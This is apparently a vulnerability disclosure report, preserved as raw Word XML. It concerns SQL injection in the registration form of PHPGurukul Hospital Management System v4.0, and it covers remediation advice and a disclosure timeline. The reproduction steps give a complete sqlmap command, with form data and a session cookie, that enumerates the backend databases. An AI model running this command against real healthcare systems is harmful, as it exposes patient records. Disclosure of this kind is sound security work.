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84cmalwe82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Vulnerability Overview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Hospital Management System v4.0 user registration functionality suffers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multiple SQL injection vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> across all form parameters, enabling unauthenticated attackers to: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database enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (users, patients, medical records)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Impact: Unauthorized data access and extraction from healthcare databases, potentially exposing sensitive patient information.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wuq0pu2g1wjq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Official Website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PHPGurukul Hospital Management System v4.0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sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_15zcq8lqlk2m" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="1f2328"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to Reproduce</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
          <w:rtl w:val="0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Technical Details)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Vulnerable Endpoint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http://localhost/hospital/hms/registration.php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Add the Data and Capture the request in BurpSuite. And using the CO2 extension from burpsuite. Make the sqlmap payload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10238" cy="170482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1704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Copy the above command and paste into the sqlmap.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Command:-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 sqlmap.py -u "http://localhost:80/hospital/hms/registration.php" --data="full_name=wremad^&amp;address=wremad^&amp;city=wremad%40wremad.com^&amp;gender=male^&amp;email=wre%40wred.com^&amp;password=admin^&amp;password_again=admin^&amp;submit=" --cookie="PHPSESSID=1nqogetn99ctmhntgftaklifnf" --random-agent --dbms=mysql -dbs --batch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-180974</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>209550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6253538" cy="3289864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538" cy="3289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wcemqgf6ln1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5ugj0qrrn81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tkwdeb2drg0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xn31iw8yf4t5" w:id="6"/>
      <w:bookmarkEnd w:id="6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Remediation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Prepared Statements (Parameterized Queries):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Avoid dynamic SQL queries that directly concatenate user input.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Input Validation &amp; Sanitization:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Implement strong input validation and reject inputs containing SQL metacharacters.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Least Privilege Principle:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ensure the database account used by the application has only the minimum required privileges.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Web Application Firewall (WAF):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Deploy a WAF to detect and block malicious SQL queries.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Error Handling:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Suppress detailed database errors from user-facing interfaces.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l6s14tg1qpx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4qd12ryx1y4i" w:id="8"/>
      <w:bookmarkEnd w:id="8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OWASP Top 10 - </w:t>
      </w:r>
      <w:hyperlink r:id="rId13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A03: Injection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SQLMap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hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0969da"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP SQL Injection Prevention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rviet0dp452q" w:id="9"/>
      <w:bookmarkEnd w:id="9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Disclosure Timeline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="5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4125"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1635"/>
            <w:gridCol w:w="412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Rule="auto"/>
              <w:jc w:val="center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lineRule="auto"/>
              <w:jc w:val="center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highlight w:val="white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2025-09-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="d1d9e0" w:space="0" w:sz="6" w:val="single"/>
              <w:left w:color="d1d9e0" w:space="0" w:sz="6" w:val="single"/>
              <w:bottom w:color="d1d9e0" w:space="0" w:sz="6" w:val="single"/>
              <w:right w:color="d1d9e0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lineRule="auto"/>
              <w:rPr>
                <w:color w:val="1f23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highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Identified via SQLMap</w:t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vm8alpo29rol" w:id="10"/>
      <w:bookmarkEnd w:id="1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Author</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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Report generated by: DEV RAVAL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owasp.org/Top10/A03_2021-Injection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cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlmap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phpgurukul.com/hospital-management-system-in-php/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/hospital/hms/registration.php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